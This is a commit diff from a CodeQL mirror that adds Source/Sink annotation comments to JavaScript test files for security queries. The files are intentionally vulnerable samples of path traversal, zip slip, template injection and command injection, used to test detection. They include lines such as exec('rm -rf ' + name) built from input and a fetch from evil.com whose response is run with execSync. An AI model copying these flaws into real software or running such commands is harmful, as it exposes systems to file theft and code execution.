hohn/codeql
1
0
Fork 0
mirror of https://github.com/github/codeql.git synced 2026-04-25 00:35:20 +02:00
Code Issues Packages Projects Releases Wiki Activity

JS: Accept Sources/Sink tags

Browse Source
This commit is contained in:
Asger F
2025-02-26 13:57:10 +01:00
parent 19cada38ff
commit 64d39da5f8
211 changed files with 796 additions and 796 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/tst-UntrustedDataToExternalAPI.js
View File

@@ -1,6 +1,6 @@
let externalLib = require('external-lib');
let untrusted = window.name;
let untrusted = window.name; // $ Source
externalLib(untrusted); // $ Alert
externalLib({x: untrusted}); // $ Alert

2
javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js
View File

@@ -4,7 +4,7 @@ import { parse } from 'url';
import { join } from 'path';
var server = createServer(function(req, res) {
let path = parse(req.url, true).query.path;
let path = parse(req.url, true).query.path; // $ Source
res.write(readFileSync(join("public", path))); // $ Alert - This could read any file on the file system
});

18
javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js
View File

@@ -6,7 +6,7 @@ var fs = require('fs'),
;
var server = http.createServer(function(req, res) {
let path = url.parse(req.url, true).query.path;
let path = url.parse(req.url, true).query.path; // $ Source
res.write(fs.readFileSync(path)); // $ Alert - This could read any file on the file system
@@ -33,7 +33,7 @@ var server = http.createServer(function(req, res) {
path = sanitize(path);
res.write(fs.readFileSync(path)); // OK - Path is sanitized
path = url.parse(req.url, true).query.path;
path = url.parse(req.url, true).query.path; // $ Source
// OK - basename is safe
res.write(fs.readFileSync(pathModule.basename(path)));
res.write(fs.readFileSync(pathModule.dirname(path))); // $ Alert - taint is preserved
@@ -70,7 +70,7 @@ var server = http.createServer(function(req, res) {
})();
var server = http.createServer(function(req, res) {
let path = url.parse(req.url, true).query.path;
let path = url.parse(req.url, true).query.path; // $ Source
res.write(fs.readFileSync(fs.realpathSync(path))); // $ Alert
fs.realpath(path,
@@ -106,13 +106,13 @@ var server = http.createServer(function(req, res) {
});
var server = http.createServer(function(req, res) {
let path = url.parse(req.url, true).query.path;
let path = url.parse(req.url, true).query.path; // $ Source
require('send')(req, path); // $ Alert
});
var server = http.createServer(function(req, res) {
let path = url.parse(req.url, true).query.path;
let path = url.parse(req.url, true).query.path; // $ Source
fs.readFileSync(path); // $ Alert
@@ -136,7 +136,7 @@ var server = http.createServer(function(req, res) {
});
var server = http.createServer(function(req, res) {
let path = url.parse(req.url, true).query.path;
let path = url.parse(req.url, true).query.path; // $ Source
// Removal of forward-slash or dots.
res.write(fs.readFileSync(path.replace(/[\]\[*,;'"`<>\\?\/]/g, '')));
@@ -181,14 +181,14 @@ var server = http.createServer(function(req, res) {
const cp = require("child_process");
var server = http.createServer(function(req, res) {
let path = url.parse(req.url, true).query.path;
let path = url.parse(req.url, true).query.path; // $ Source
cp.execSync("foobar", {cwd: path}); // $ Alert
cp.execFileSync("foobar", ["args"], {cwd: path}); // $ Alert
cp.execFileSync("foobar", {cwd: path}); // $ Alert
});
var server = http.createServer(function(req, res) {
let path = url.parse(req.url, true).query.path;
let path = url.parse(req.url, true).query.path; // $ Source
// Removal of forward-slash or dots.
res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", 'g'), '')));
@@ -197,7 +197,7 @@ var server = http.createServer(function(req, res) {
});
var server = http.createServer(function(req, res) {
let path = url.parse(req.url, true).query.path;
let path = url.parse(req.url, true).query.path; // $ Source
res.write(fs.readFileSync(path.replace(new RegExp("[.]", 'g'), ''))); // $ Alert - can be absolute

2
javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js
View File

@@ -5,7 +5,7 @@ const fs = require('fs'),
const ROOT = "/var/www/";
var server = http.createServer(function(req, res) {
let filePath = url.parse(req.url, true).query.path;
let filePath = url.parse(req.url, true).query.path; // $ Source
res.write(fs.readFileSync(ROOT + filePath, 'utf8')); // $ Alert - This function uses unsanitized input that can read any file on the file system.
});

46
javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js
View File

@@ -8,7 +8,7 @@ var fs = require('fs'),
let app = express();
app.get('/basic', (req, res) => {
let path = req.query.path;
let path = req.query.path; // $ Source
fs.readFileSync(path); // $ Alert
fs.readFileSync('./' + path); // $ Alert
@@ -18,7 +18,7 @@ app.get('/basic', (req, res) => {
});
app.get('/normalize', (req, res) => {
let path = pathModule.normalize(req.query.path);
let path = pathModule.normalize(req.query.path); // $ Source
fs.readFileSync(path); // $ Alert
fs.readFileSync('./' + path); // $ Alert
@@ -28,7 +28,7 @@ app.get('/normalize', (req, res) => {
});
app.get('/normalize-notAbsolute', (req, res) => {
let path = pathModule.normalize(req.query.path);
let path = pathModule.normalize(req.query.path); // $ Source
if (pathModule.isAbsolute(path))
return;
@@ -51,7 +51,7 @@ app.get('/normalize-notAbsolute', (req, res) => {
});
app.get('/normalize-noInitialDotDot', (req, res) => {
let path = pathModule.normalize(req.query.path);
let path = pathModule.normalize(req.query.path); // $ Source
if (path.startsWith(".."))
return;
@@ -70,7 +70,7 @@ app.get('/normalize-noInitialDotDot', (req, res) => {
app.get('/prepend-normalize', (req, res) => {
// Coerce to relative prior to normalization
let path = pathModule.normalize('./' + req.query.path);
let path = pathModule.normalize('./' + req.query.path); // $ Source
if (!path.startsWith(".."))
fs.readFileSync(path);
@@ -79,7 +79,7 @@ app.get('/prepend-normalize', (req, res) => {
});
app.get('/absolute', (req, res) => {
let path = req.query.path;
let path = req.query.path; // $ Source
if (!pathModule.isAbsolute(path))
return;
@@ -91,7 +91,7 @@ app.get('/absolute', (req, res) => {
});
app.get('/normalized-absolute', (req, res) => {
let path = pathModule.normalize(req.query.path);
let path = pathModule.normalize(req.query.path); // $ Source
if (!pathModule.isAbsolute(path))
return;
@@ -114,7 +114,7 @@ app.get('/combined-check', (req, res) => {
});
app.get('/realpath', (req, res) => {
let path = fs.realpathSync(req.query.path);
let path = fs.realpathSync(req.query.path); // $ Source
fs.readFileSync(path); // $ Alert
fs.readFileSync(pathModule.join(path, 'index.html')); // $ Alert
@@ -127,7 +127,7 @@ app.get('/realpath', (req, res) => {
});
app.get('/coerce-relative', (req, res) => {
let path = pathModule.join('.', req.query.path);
let path = pathModule.join('.', req.query.path); // $ Source
if (!path.startsWith('..'))
fs.readFileSync(path);
@@ -136,7 +136,7 @@ app.get('/coerce-relative', (req, res) => {
});
app.get('/coerce-absolute', (req, res) => {
let path = pathModule.join('/home/user/www', req.query.path);
let path = pathModule.join('/home/user/www', req.query.path); // $ Source
if (path.startsWith('/home/user/www'))
fs.readFileSync(path);
@@ -145,7 +145,7 @@ app.get('/coerce-absolute', (req, res) => {
});
app.get('/concat-after-normalization', (req, res) => {
let path = 'foo/' + pathModule.normalize(req.query.path);
let path = 'foo/' + pathModule.normalize(req.query.path); // $ Source
if (!path.startsWith('..'))
fs.readFileSync(path); // $ Alert - prefixing foo/ invalidates check
@@ -157,7 +157,7 @@ app.get('/concat-after-normalization', (req, res) => {
});
app.get('/noDotDot', (req, res) => {
let path = pathModule.normalize(req.query.path);
let path = pathModule.normalize(req.query.path); // $ Source
if (path.includes('..'))
return;
@@ -171,7 +171,7 @@ app.get('/noDotDot', (req, res) => {
});
app.get('/join-regression', (req, res) => {
let path = req.query.path;
let path = req.query.path; // $ Source
// Regression test for a specific corner case:
// Some guard nodes sanitize both branches, but for a different set of flow labels.
@@ -211,7 +211,7 @@ app.get('/join-regression', (req, res) => {
});
app.get('/decode-after-normalization', (req, res) => {
let path = pathModule.normalize(req.query.path);
let path = pathModule.normalize(req.query.path); // $ Source
if (!pathModule.isAbsolute(path) && !path.startsWith('..'))
fs.readFileSync(path);
@@ -223,7 +223,7 @@ app.get('/decode-after-normalization', (req, res) => {
});
app.get('/replace', (req, res) => {
let path = pathModule.normalize(req.query.path).replace(/%20/g, ' ');
let path = pathModule.normalize(req.query.path).replace(/%20/g, ' '); // $ Source
if (!pathModule.isAbsolute(path)) {
fs.readFileSync(path); // $ Alert
@@ -233,7 +233,7 @@ app.get('/replace', (req, res) => {
});
app.get('/resolve-path', (req, res) => {
let path = pathModule.resolve(req.query.path);
let path = pathModule.resolve(req.query.path); // $ Source
fs.readFileSync(path); // $ Alert
@@ -251,7 +251,7 @@ app.get('/resolve-path', (req, res) => {
});
app.get('/relative-startswith', (req, res) => {
let path = pathModule.resolve(req.query.path);
let path = pathModule.resolve(req.query.path); // $ Source
fs.readFileSync(path); // $ Alert
@@ -300,7 +300,7 @@ app.get('/relative-startswith', (req, res) => {
var isPathInside = require("is-path-inside"),
pathIsInside = require("path-is-inside");
app.get('/pseudo-normalizations', (req, res) => {
let path = req.query.path;
let path = req.query.path; // $ Source
fs.readFileSync(path); // $ Alert
if (isPathInside(path, SAFE)) {
fs.readFileSync(path);
@@ -336,7 +336,7 @@ app.get('/pseudo-normalizations', (req, res) => {
});
app.get('/yet-another-prefix', (req, res) => {
let path = pathModule.resolve(req.query.path);
let path = pathModule.resolve(req.query.path); // $ Source
fs.readFileSync(path); // $ Alert
@@ -351,7 +351,7 @@ app.get('/yet-another-prefix', (req, res) => {
var rootPath = process.cwd();
app.get('/yet-another-prefix2', (req, res) => {
let path = req.query.path;
let path = req.query.path; // $ Source
fs.readFileSync(path); // $ Alert
@@ -374,7 +374,7 @@ app.get('/yet-another-prefix2', (req, res) => {
import slash from 'slash';
app.get('/slash-stuff', (req, res) => {
let path = req.query.path;
let path = req.query.path; // $ Source
fs.readFileSync(path); // $ Alert
@@ -382,7 +382,7 @@ app.get('/slash-stuff', (req, res) => {
});
app.get('/dotdot-regexp', (req, res) => {
let path = pathModule.normalize(req.query.x);
let path = pathModule.normalize(req.query.x); // $ Source
if (pathModule.isAbsolute(path))
return;
fs.readFileSync(path); // $ Alert
@@ -409,7 +409,7 @@ app.get('/join-spread', (req, res) => {
});
app.get('/dotdot-matchAll-regexp', (req, res) => {
let path = pathModule.normalize(req.query.x);
let path = pathModule.normalize(req.query.x); // $ Source
if (pathModule.isAbsolute(path))
return;
fs.readFileSync(path); // $ Alert

10
javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js
View File

@@ -6,7 +6,7 @@ var http = require("http"),
originalFs = require("original-fs");
var server = http.createServer(function(req, res) {
var path = url.parse(req.url, true).query.path;
var path = url.parse(req.url, true).query.path; // $ Source
fs.readFileSync(path); // $ Alert
gracefulFs.readFileSync(path); // $ Alert
@@ -35,7 +35,7 @@ function getFsModule(special) {
var util = require("util");
http.createServer(function(req, res) {
var path = url.parse(req.url, true).query.path;
var path = url.parse(req.url, true).query.path; // $ Source
util.promisify(fs.readFileSync)(path); // $ Alert
require("bluebird").promisify(fs.readFileSync)(path); // $ Alert
@@ -46,7 +46,7 @@ http.createServer(function(req, res) {
const asyncFS = require("./my-async-fs-module");
http.createServer(function(req, res) {
var path = url.parse(req.url, true).query.path;
var path = url.parse(req.url, true).query.path; // $ Source
fs.readFileSync(path); // $ Alert
asyncFS.readFileSync(path); // $ Alert
@@ -65,7 +65,7 @@ http.createServer(function(req, res) {
const mkdirp = require("mkdirp");
http.createServer(function(req, res) {
var path = url.parse(req.url, true).query.path;
var path = url.parse(req.url, true).query.path; // $ Source
fs.readFileSync(path); // $ Alert
mkdirp(path); // $ Alert
@@ -78,7 +78,7 @@ function func(x) {
const fsp = require("fs/promises");
http.createServer(function(req, res) {
var path = url.parse(req.url, true).query.path;
var path = url.parse(req.url, true).query.path; // $ Source
fsp.readFile(path); // $ Alert
});

2
javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js
View File

@@ -3,7 +3,7 @@ const prettier = require("prettier");
const app = express();
app.get('/some/path', function (req, res) {
const { p } = req.params;
const { p } = req.params; // $ Source
prettier.resolveConfig(p).then((options) => { // $ Alert
const formatted = prettier.format("foo", options);
});

2
javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/pupeteer.js
View File

@@ -2,7 +2,7 @@ const puppeteer = require('puppeteer');
const parseTorrent = require('parse-torrent');
(async () => {
let tainted = "dir/" + parseTorrent(torrent).name + ".torrent.data";
let tainted = "dir/" + parseTorrent(torrent).name + ".torrent.data"; // $ Source
const browser = await puppeteer.launch();
const page = await browser.newPage();

2
javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js
View File

@@ -10,7 +10,7 @@ function getTree(req, res, options) {
var workspaceId = req.params.workspaceId;
var realfileRootPath = workspaceId; // getfileRoot(workspaceId);
var filePath = workspaceId; // path.join(options.workspaceDir,realfileRootPath, req.params["0"]);
withStatsAndETag(req.params.workspaceId, function (err, stats, etag) {});
withStatsAndETag(req.params.workspaceId, function (err, stats, etag) {}); // $ Source
}
function getfileRoot(workspaceId) {

6
javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js
View File

@@ -3,7 +3,7 @@ var fs = require('fs'),
url = require('url');
var server = http.createServer(function(req, res) {
let path = url.parse(req.url, true).query.path;
let path = url.parse(req.url, true).query.path; // $ Source
fs.readFileSync(path); // $ Alert
@@ -36,7 +36,7 @@ server.listen();
var nodefs = require('node:fs');
var server2 = http.createServer(function(req, res) {
let path = url.parse(req.url, true).query.path;
let path = url.parse(req.url, true).query.path; // $ Source
nodefs.readFileSync(path); // $ Alert
});
@@ -45,6 +45,6 @@ server2.listen();
const chownr = require("chownr");
var server3 = http.createServer(function (req, res) {
let path = url.parse(req.url, true).query.path;
let path = url.parse(req.url, true).query.path; // $ Source
chownr(path, "someuid", "somegid", function (err) {}); // $ Alert
});

2
javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js
View File

@@ -3,7 +3,7 @@ var fs = require('fs'),
url = require('url');
var server = http.createServer(function(req, res) {
let path = url.parse(req.url, true).query.path;
let path = url.parse(req.url, true).query.path; // $ Source
doRead(Promise.resolve(path));
});

2
javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js
View File

@@ -3,7 +3,7 @@ var fs = require('fs'),
url = require('url');
var server = http.createServer(function(req, res) {
let path = url.parse(req.url, true).query.path;
let path = url.parse(req.url, true).query.path; // $ Source
fs.readFileSync(path.substring(i, j));
fs.readFileSync(path.substring(4)); // $ Alert
fs.readFileSync(path.substring(0, i)); // $ Alert

2
javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js
View File

@@ -2,7 +2,7 @@ const parseTorrent = require('parse-torrent'),
fs = require('fs');
function getTorrentData(dir, torrent){
let name = parseTorrent(torrent).name,
let name = parseTorrent(torrent).name, // $ Source
loc = dir + "/" + name + ".torrent.data";
return fs.readFileSync(loc); // $ Alert
}

2
javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts
View File

@@ -6,7 +6,7 @@ var fs = require('fs'),
;
var server = http.createServer(function(req, res) {
let path = url.parse(req.url, true).query.path;
let path = url.parse(req.url, true).query.path; // $ Source
res.write(fs.readFileSync(path)); // $ Alert - This could read any file on the file system

10
javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js
View File

@@ -5,7 +5,7 @@ fs.createReadStream('archive.zip')
.pipe(unzip.Parse())
.on('entry', entry => {
const fileName = entry.path; // $ Alert
entry.pipe(fs.createWriteStream(fileName));
entry.pipe(fs.createWriteStream(fileName)); // $ Sink
});
var Writer = require('fstream').Writer;
@@ -13,14 +13,14 @@ fs.createReadStream('archive.zip')
.pipe(unzip.Parse())
.on('entry', entry => {
const fileName = entry.path; // $ Alert
entry.pipe(Writer({path: fileName}));
entry.pipe(Writer({path: fileName})); // $ Sink
});
fs.createReadStream('archive.zip')
.pipe(unzip.Parse())
.on('entry', entry => {
const fileName = entry.path; // $ Alert
var file = fs.openSync(fileName, "w");
var file = fs.openSync(fileName, "w"); // $ Sink
});
const JSZip = require('jszip');
@@ -28,11 +28,11 @@ const zip = new JSZip();
const path = require('path');
function doZipSlip() {
for (const name in zip.files) { // $ Alert
fs.createWriteStream(name);
fs.createWriteStream(name); // $ Sink
}
zip.forEach((name, file) => { // $ Alert
fs.createWriteStream(name);
fs.createWriteStream(name); // $ Sink
});
const extractTo = path.resolve("/some/path/to/extract/to");

2
javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad2.js
View File

@@ -3,6 +3,6 @@ var unzip = require('unzip');
fs.readFile('path/to/archive.zip', function (err, zipContents) {
unzip.Parse(zipContents).on('entry', function (entry) {
var fileName = 'output/path/' + entry.path; // $ Alert
fs.writeFileSync(fileName, entry.contents);
fs.writeFileSync(fileName, entry.contents); // $ Sink
});
});

2
javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBadUnzipper.js
View File

@@ -5,5 +5,5 @@ fs.createReadStream('path/to/archive.zip')
.pipe(unzipper.Parse())
.on('entry', function (entry) {
var fileName = entry.path; // $ Alert
entry.pipe(fs.createWriteStream(fileName));
entry.pipe(fs.createWriteStream(fileName)); // $ Sink
});

4
javascript/ql/test/query-tests/Security/CWE-073/tst.js
View File

@@ -4,8 +4,8 @@ app.set('view engine', 'hbs');
app.use(require('body-parser').json());
app.use(require('body-parser').urlencoded({ extended: false }));
app.post('/path', function(req, res) {
var bodyParameter = req.body.bodyParameter;
var queryParameter = req.query.queryParameter;
var bodyParameter = req.body.bodyParameter; // $ Source
var queryParameter = req.query.queryParameter; // $ Source
res.render('template', bodyParameter); // $ Alert
res.render('template', queryParameter); // $ Alert

10
javascript/ql/test/query-tests/Security/CWE-073/tst2.js
View File

@@ -3,7 +3,7 @@ var app = require('express')();
app.engine( '.hbs', handlebars({ defaultLayout: 'main', extname: '.hbs' }) );
app.set('view engine', '.hbs')
app.post('/path', require('body-parser').json(), function(req, res) {
var bodyParameter = req.body.bodyParameter;
var bodyParameter = req.body.bodyParameter; // $ Source
res.render('template', bodyParameter); // $ Alert
});
@@ -23,7 +23,7 @@ app3.post('/path', require('body-parser').json(), function(req, res) {
var app4 = require('express')();
app4.set('view engine', 'ejs');
app4.post('/path', require('body-parser').json(), function(req, res) {
var bodyParameter = req.body.bodyParameter;
var bodyParameter = req.body.bodyParameter; // $ Source
res.render('template', bodyParameter); // $ Alert
});
@@ -31,7 +31,7 @@ var app5 = require('express')();
app5.engine("foobar", require("consolidate").whiskers);
app5.set('view engine', 'foobar');
app5.post('/path', require('body-parser').json(), function(req, res) {
var bodyParameter = req.body.bodyParameter;
var bodyParameter = req.body.bodyParameter; // $ Source
res.render('template', bodyParameter); // $ Alert
});
@@ -39,7 +39,7 @@ var app6 = require('express')();
app6.register(".html", require("consolidate").whiskers);
app6.set('view engine', 'html');
app6.post('/path', require('body-parser').json(), function(req, res) {
var bodyParameter = req.body.bodyParameter;
var bodyParameter = req.body.bodyParameter; // $ Source
res.render('template', bodyParameter); // $ Alert
});
@@ -48,7 +48,7 @@ var router = express.Router();
var app7 = express();
app7.set('view engine', 'ejs');
router.post('/path', require('body-parser').json(), function(req, res) {
var bodyParameter = req.body.bodyParameter;
var bodyParameter = req.body.bodyParameter; // $ Source
res.render('template', bodyParameter); // $ Alert
});
app7.use("/router", router);

4
javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js
View File

@@ -5,7 +5,7 @@ const { exec } = require('child_process');
// function to echo title
function echo_title() {
// get the title from the event pull request
const title = github.context.payload.pull_request.title;
const title = github.context.payload.pull_request.title; // $ Source
exec(`echo ${title}`, (err, stdout, stderr) => { // $ Alert
if (err) {
return;
@@ -15,7 +15,7 @@ function echo_title() {
// function which passes the issue title into an exec
function exec_head_ref() {
const head_ref = github.context.payload.pull_request.head.ref;
const head_ref = github.context.payload.pull_request.head.ref; // $ Source
aexec.exec(`echo ${head_ref}`).then((res) => { // $ Alert
console.log(res);
});

18
javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js
View File

@@ -3,7 +3,7 @@ var cp = require("child_process"),
url = require('url');
var server = http.createServer(function(req, res) {
let cmd = url.parse(req.url, true).query.path;
let cmd = url.parse(req.url, true).query.path; // $ Sink Source
cp.exec("foo");
cp.execSync("foo");
@@ -36,25 +36,25 @@ var server = http.createServer(function(req, res) {
sh = 'cmd.exe', flag = '/c';
else
sh = '/bin/sh', flag = '-c';
cp.spawn(sh, [ flag, cmd ]); // $ Alert
cp.spawn(sh, [ flag, cmd ]); // $ Alert Sink
let args = [];
args[0] = "-c";
args[1] = cmd;
args[1] = cmd; // $ Sink
cp.execFile("/bin/bash", args); // $ Alert
args = [];
args[0] = "-c";
args[1] = cmd;
args[1] = cmd; // $ Sink
run("sh", args);
args = [];
args[0] = `-` + "c";
args[1] = cmd;
args[1] = cmd; // $ Sink
cp.execFile(`/bin` + "/bash", args); // $ Alert
cp.spawn('cmd.exe', ['/C', 'foo'].concat(["bar", cmd])); // $ Alert
cp.spawn('cmd.exe', ['/C', 'foo'].concat(cmd)); // $ Alert
cp.spawn('cmd.exe', ['/C', 'foo'].concat(["bar", cmd])); // $ Alert Sink
cp.spawn('cmd.exe', ['/C', 'foo'].concat(cmd)); // $ Alert Sink
let myArgs = [];
myArgs.push(`-` + "c");
@@ -63,14 +63,14 @@ var server = http.createServer(function(req, res) {
});
function run(cmd, args) {
function run(cmd, args) { // $ Sink
cp.spawn(cmd, args); // $ Alert - but note that the sink is where `args` is build.
}
var util = require("util")
http.createServer(function(req, res) {
let cmd = url.parse(req.url, true).query.path;
let cmd = url.parse(req.url, true).query.path; // $ Source
util.promisify(cp.exec)(cmd); // $ Alert
});

4
javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js
View File

@@ -12,10 +12,10 @@ function getShell() {
function execSh(command, options) {
var shell = getShell()
return cp.spawn(shell.cmd, [shell.arg, command], options) // $ Alert
return cp.spawn(shell.cmd, [shell.arg, command], options) // $ Alert Sink
}
http.createServer(function (req, res) {
let cmd = url.parse(req.url, true).query.path;
let cmd = url.parse(req.url, true).query.path; // $ Source
execSh(cmd);
});

4
javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js
View File

@@ -7,10 +7,10 @@ function getShell() {
}
function execSh(command, options) {
return cp.spawn(getShell(), ["-c", command], options) // $ Alert
return cp.spawn(getShell(), ["-c", command], options) // $ Alert Sink
};
http.createServer(function (req, res) {
let cmd = url.parse(req.url, true).query.path;
let cmd = url.parse(req.url, true).query.path; // $ Source
execSh(cmd);
});

2
javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js
View File

@@ -15,6 +15,6 @@ function execEach(commands) {
};
require('http').createServer(function(req, res) {
let cmd = require('url').parse(req.url, true).query.path;
let cmd = require('url').parse(req.url, true).query.path; // $ Source
execEach([cmd]);
});

12
javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js
View File

@@ -10,7 +10,7 @@ app.post('/profile', upload.single('avatar'), function (req, res, next) {
});
app.post('/photos/upload', upload.array('photos', 12), function (req, res, next) {
req.files.forEach(file => {
req.files.forEach(file => { // $ Source
exec("touch " + file.originalname); // $ Alert
})
});
@@ -21,7 +21,7 @@ var Busboy = require('busboy');
http.createServer(function (req, res) {
var busboy = new Busboy({ headers: req.headers });
busboy.on('file', function (fieldname, file, filename, encoding, mimetype) {
busboy.on('file', function (fieldname, file, filename, encoding, mimetype) { // $ Source
exec("touch " + filename); // $ Alert
});
req.pipe(busboy);
@@ -32,12 +32,12 @@ const formidable = require('formidable');
app.post('/api/upload', (req, res, next) => {
let form = formidable({ multiples: true });
form.parse(req, (err, fields, files) => {
form.parse(req, (err, fields, files) => { // $ Source
exec("touch " + fields.name); // $ Alert
});
let form2 = new formidable.IncomingForm();
form2.parse(req, (err, fields, files) => {
form2.parse(req, (err, fields, files) => { // $ Source
exec("touch " + fields.name); // $ Alert
});
});
@@ -49,13 +49,13 @@ http.createServer(function (req, res) {
// parse a file upload
var form = new multiparty.Form();
form.parse(req, function (err, fields, files) {
form.parse(req, function (err, fields, files) { // $ Source
exec("touch " + fields.name); // $ Alert
});
var form2 = new multiparty.Form();
form2.on('part', function (part) { // / file / field
form2.on('part', function (part) { // $ Source - / file / field
exec("touch " + part.filename); // $ Alert
});
form2.parse(req);

2
javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js
View File

@@ -2,7 +2,7 @@ var http = require("http"),
url = require("url");
var server = http.createServer(function (req, res) {
let cmd = url.parse(req.url, true).query.path;
let cmd = url.parse(req.url, true).query.path; // $ Source
require("cross-spawn").sync(cmd); // $ Alert
require("execa").shell(cmd); // $ Alert

2
javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/third-party-command-injection.js
View File

@@ -2,7 +2,7 @@ let https = require("https"),
cp = require("child_process");
https.get("https://evil.com/getCommand", res =>
res.on("data", command => {
res.on("data", command => { // $ Source
cp.execSync(command); // $ Alert
})
);

2
javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js
View File

@@ -9,6 +9,6 @@ function test(e) {
exec(e['GITHUB_ACTION']);
}
test(process.env);
test(process.env); // $ Source
exec(getInput('data')); // $ Alert

32
javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js
View File

@@ -7,7 +7,7 @@ var cp = require("child_process");
cp.exec("cmd.sh " + process.argv[1]);
cp.exec("cmd.sh " + process.argv[2]); // $ Alert
var args = process.argv.slice(2);
var args = process.argv.slice(2); // $ Source
cp.execSync(args[0]); // $ Alert
cp.execSync("cmd.sh " + args[0]); // $ Alert
@@ -21,7 +21,7 @@ var cp = require("child_process");
});
(function() {
const args = process.argv.slice(2);
const args = process.argv.slice(2); // $ Source
const script = path.join(packageDir, 'app', 'index.js');
cp.execSync(`node ${script} ${args[0]} --option"`); // $ Alert
cp.execSync(`node ${script} ${args.join(' ')} --option"`); // $ Alert
@@ -36,7 +36,7 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert
var args = require('yargs') // eslint-disable-line
.command('serve [port]', 'start the server', (yargs) => { })
.option('verbose', { foo: "bar" })
.argv
.argv // $ Source
cp.exec("cmd.sh " + args); // $ Alert
@@ -47,15 +47,15 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert
const {
argv: {
...args
},
}, // $ Source
} = require('yargs')
.usage('Usage: foo bar')
.command();
cp.exec("cmd.sh " + args); // $ Alert
var tainted1 = require('yargs').argv;
var tainted2 = require('yargs').parse()
var tainted1 = require('yargs').argv; // $ Source
var tainted2 = require('yargs').parse() // $ Source
const {taint1: {...taint1rest},taint2: {...taint2rest}} = {
taint1: tainted1,
@@ -65,15 +65,15 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert
cp.exec("cmd.sh " + taint1rest); // $ Alert - has flow from tainted1
cp.exec("cmd.sh " + taint2rest); // $ Alert - has flow from tianted2
var {...taint3} = require('yargs').argv;
var {...taint3} = require('yargs').argv; // $ Source
cp.exec("cmd.sh " + taint3); // $ Alert
var [...taint4] = require('yargs').argv;
var [...taint4] = require('yargs').argv; // $ Source
cp.exec("cmd.sh " + taint4); // $ Alert
});
(function () {
const argv = process.argv.slice(2);
const argv = process.argv.slice(2); // $ Source
var minimist = require("minimist");
cp.exec("cmd.sh " + minimist(argv).foo); // $ Alert
@@ -85,10 +85,10 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert
cp.exec("cmd.sh " + yargsParser(process.argv.slice(2)).foo); // $ Alert
import args from 'args'
var flags = args.parse(process.argv);
var flags = args.parse(process.argv); // $ Source
cp.exec("cmd.sh " + flags.foo); // $ Alert
var flags = require('arg')({...spec});
var flags = require('arg')({...spec}); // $ Source
cp.exec("cmd.sh " + flags.foo); // $ Alert
})
@@ -104,14 +104,14 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert
(function () {
const commandLineArgs = require('command-line-args');
const options = commandLineArgs(optionDefinitions);
const options = commandLineArgs(optionDefinitions); // $ Source
cp.exec("cmd.sh " + options.foo); // $ Alert
});
(function () {
const meow = require('meow');
const cli = meow(`helpstring`, {flags: {...flags}});
const cli = meow(`helpstring`, {flags: {...flags}}); // $ Source
cp.exec("cmd.sh " + cli.input[0]); // $ Alert
});
@@ -119,18 +119,18 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert
(function () {
var dashdash = require('dashdash');
var opts = dashdash.parse({options: options});
var opts = dashdash.parse({options: options}); // $ Source
cp.exec("cmd.sh " + opts.foo); // $ Alert
var parser = dashdash.createParser({options: options});
var opts = parser.parse();
var opts = parser.parse(); // $ Source
cp.exec("cmd.sh " + opts.foo); // $ Alert
});
(function () {
const { program } = require('commander');
const { program } = require('commander'); // $ Source
program.version('0.0.1');
cp.exec("cmd.sh " + program.opts().pizzaType); // $ Alert

4
javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js
View File

@@ -3,14 +3,14 @@ const app = express();
const { execFile } = require("child_process");
app.get("/", (req, res) => {
const remote = req.query.remote;
const remote = req.query.remote; // $ Source
execFile("git", ["ls-remote", remote]); // $ Alert
execFile("git", ["fetch", remote]); // $ Alert
indirect("git", ["ls-remote", remote]); // $ Alert
const myArgs = req.query.args;
const myArgs = req.query.args; // $ Source
execFile("git", myArgs); // $ Alert

4
javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js
View File

@@ -2,6 +2,6 @@
const cp = require("child_process");
module.exports.thisMethodIsImported = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.thisMethodIsImported = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
}

246
javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js
View File

@@ -1,44 +1,44 @@
var cp = require("child_process")
module.exports.blah = function (name) {
